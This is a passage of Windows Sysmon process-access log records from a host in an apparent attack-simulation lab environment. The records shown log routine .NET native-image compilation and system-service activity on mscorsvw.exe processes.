{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7104,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.855\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-00101ADD0E00}\r\nTargetProcessId: 2764\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.855","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-00101ADD0E00}","TargetProcessId":"2764","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7105,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.886\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-0010C8E00E00}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.886","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-0010C8E00E00}","TargetProcessId":"3468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7106,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.886\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-0010C8E00E00}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.886","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-0010C8E00E00}","TargetProcessId":"3468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7107,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.902\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-0010C8E00E00}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.902","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-0010C8E00E00}","TargetProcessId":"3468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7108,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.949\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-0010C8B00D00}\r\nTargetProcessId: 5112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.949","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-0010C8B00D00}","TargetProcessId":"5112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7109,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.949\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-0010C8B00D00}\r\nTargetProcessId: 5112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.949","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-0010C8B00D00}","TargetProcessId":"5112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7110,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.949\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-0010C8B00D00}\r\nTargetProcessId: 5112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.949","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-0010C8B00D00}","TargetProcessId":"5112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7111,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.980\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-0010E0E70E00}\r\nTargetProcessId: 4052\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 